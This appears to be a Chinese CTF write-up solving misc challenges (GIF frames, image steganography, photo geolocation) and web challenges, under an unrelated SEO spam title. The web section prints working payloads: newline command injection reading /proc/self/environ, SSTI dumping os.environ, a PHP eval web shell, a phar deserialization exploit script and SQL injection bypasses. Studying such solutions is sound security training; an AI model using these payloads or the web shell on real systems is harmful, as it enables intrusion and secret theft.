国外工业产品设计网站重庆seo培训

misc

misc1

查看源码gif取证，那就是分析那一gif图片了，随波逐流直接gif分帧查看，在cc翻到

misc2 

此题乍一看不知道考啥，仔细分析一下只有一张图片，也只能考图片隐写了，另存为010打开，看到敏感base64字符，解密得到fllag

misc3 

首先注意审题，不然有得受的。

图片打开，信息太多了，直接百度地图搜索珠江城。 

开全景一看，没错了，看到了广州银行与创兴银行 

大致位置确定了，接下来就是找这个视角位置，首先这视角珠江城前方，且很高。 百度识图一下，发现小红书提到四季酒店，高德地图一看，有可能，试一下果然是

flag{广东省-广州市-天河区-珠江新城珠江西路-5号} 

web

ping_server

直接抓环境变量env

还有高手直接盲抓一手环境里的变量$FLAG 

 ssti也能打，不过还是抓环境127.0.0.1%0a{{lipsum.__globals__.os.environ}}

 127.0.0.1%0acat /proc/self/environ（利用proc读环境）

Proc 目录在 CTF 中的利用-安全KER - 安全资讯平台 

当然也可以printenv

printenv命令 – 显示系统环境变量与值 – Linux命令大全(手册)

template_injection

首先fuzz一下，发现386的长度的被过滤

这里关键词绕过还好，主要是这个()与[]被过滤了就很难受，那只能利用os读环境变量了

name={{lipsum.__globals__.os.environ}}

upload-difficult

非预期

上传一句话木马<?php eval($_REQUEST['1']);?>，然后直接找flag即可

预期解法 

上传一句话木马后，发现了classes.php

<?php
class FileProcessor {private $handler;public function __destruct() {$this->handler->cleanup();}
}class TempFileHandler {public $filename;public function cleanup() {// 触发__toString的关键点echo "Cleaning: " . $this->filename . "<br>";if (file_exists((string)$this->filename)) {unlink((string)$this->filename);}}
}class Logger {private $log_content;public function __toString() {$flag = getenv('FLAG');return base64_encode($flag);}
}class DatabaseConnection {// 保留混淆类public $query;public function execute() {new PDO('sqlite::memory:');return "Executed: ".$this->query;}
}

就是打一个phar反序列化。

<?php
class FileProcessor {public  $handler;public function __destruct() {$this->handler->cleanup();}
}class TempFileHandler {public $filename;public function cleanup() {// 触发__toString的关键点echo "Cleaning: " . $this->filename . "<br>";if (file_exists((string)$this->filename)) {unlink((string)$this->filename);}}
}class Logger {private $log_content;public function __toString() {$flag = getenv('FLAG');return base64_encode($flag);}
}class DatabaseConnection {// 保留混淆类public $query;public function execute() {new PDO('sqlite::memory:');return "Executed: ".$this->query;}
}
$a=new FileProcessor();
$a->handler=new TempFileHandler();
$a->handler->filename=new Logger();$phar = new Phar("iclesctf.phar"); // 创建一个名为 iclesctf.phar 的 Phar 文件
$phar->startBuffering();       // 开始缓冲，以允许修改 Phar 文件
$phar->setStub('<?php __HALT_COMPILER(); ?>'); // 设置 Phar 文件的存根（Stub），防止被误认为普通 PHP 脚本
$phar->setMetadata($a);   // 将 Chunqiu 对象作为元数据存储在 Phar 文件中
$phar->addFromString("exp.txt", "test"); // 向 Phar 文件中添加一个名为 exp.txt 的文件，内容为 "test"
$phar->stopBuffering(); 
?>

配置看配环境小记之phar.readonly=Off坑_uncaught unexpectedvalueexception: creating archiv-CSDN博客 

 ezsql

直接打万能密码，发现在password有sql注入 （过滤了or，直接大小写绕过）

看列数（过滤了一些关键词，与空格）

看回显点在2. 

这题看似sql，其实是sqlite. 

 SQLite sqlite_master_sqlite master-CSDN博客